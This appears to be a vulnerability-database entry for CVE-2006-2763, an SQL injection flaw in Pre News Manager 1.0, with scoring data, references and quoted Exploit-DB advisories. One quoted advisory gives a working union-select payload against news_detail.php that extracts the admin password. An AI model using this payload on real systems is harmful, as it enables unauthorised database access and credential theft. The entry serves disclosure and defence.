CVE-2006-2763
Published 2006-06-02
Priority P3 · 36 · medium · 6.4 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:N
EXPLOIT
EPSS: 2.87% (85.0th percentile)
SQL injection vulnerability in Pre News Manager 1.0 allows remote attackers to execute arbitrary SQL commands via the (1) id parameter to (a) index.php, and the (2) nid parameter to (b) news_detail.php, (c) email_story.php, (d) thankyou.php, (e) printable_view.php, (f) tella_friend.php, and (g) send_comments.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. It is possible that this is primary to CVE-2006-2678.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pre_projects | pre_news_manager | — | — |
No detection rules found.
Exploit-DB
Pre News Manager 1.0 - 'id' SQL Injection
exploitdb·2008-06-13
---
ECHO.OR.ID
ECHO_ADV_97$2008
[ECHO_ADV_97$2008] Pre News Manager <= 1.0 (index.php id) Sql Injection Vulnerability
Author : M.Hasran Addahroni
Date : June 13th, 2008
Location : Jakarta, Indonesia
Web : http://e-rdc.org/v1/news.php?readmore=97
Critical Lvl : Medium
Impact : System access
Where : From Remote
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Pre News Manager
version : <= 1.0
Vendor : http://www.preproject.com/news.asp
Description :
Pre News Manager is online news publishing system. Very easy to manage and integration. Powerful online news mana
Exploit-DB
Pre News Manager 1.0 - SQL Injection
exploitdb·2007-05-03
---
Pre News Manager v1.0 Remote SQL Injection
Found: Cyber-Security.org
Script site: http://www.preproject.com/news.asp
Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*
Example: http://www.preproject.com/news%20manager/
# milw0rm.com [2007-05-03]
No writeups or analysis indexed.
http://secunia.com/advisories/20284
http://www.osvdb.org/26073
http://www.osvdb.org/26074
http://www.osvdb.org/26075
http://www.osvdb.org/26076
http://www.osvdb.org/26077
http://www.osvdb.org/26078
http://www.osvdb.org/26079
http://www.securityfocus.com/archive/1/493369/100/0/threaded
http://www.securityfocus.com/archive/1/497185/100/0/threaded
http://www.securityfocus.com/archive/1/497219/100/0/threaded
http://www.vupen.com/english/advisories/2006/1990
https://exchange.xforce.ibmcloud.com/vulnerabilities/34035
https://exchange.xforce.ibmcloud.com/vulnerabilities/43070
https://www.exploit-db.com/exploits/5803
2006-06-02
Published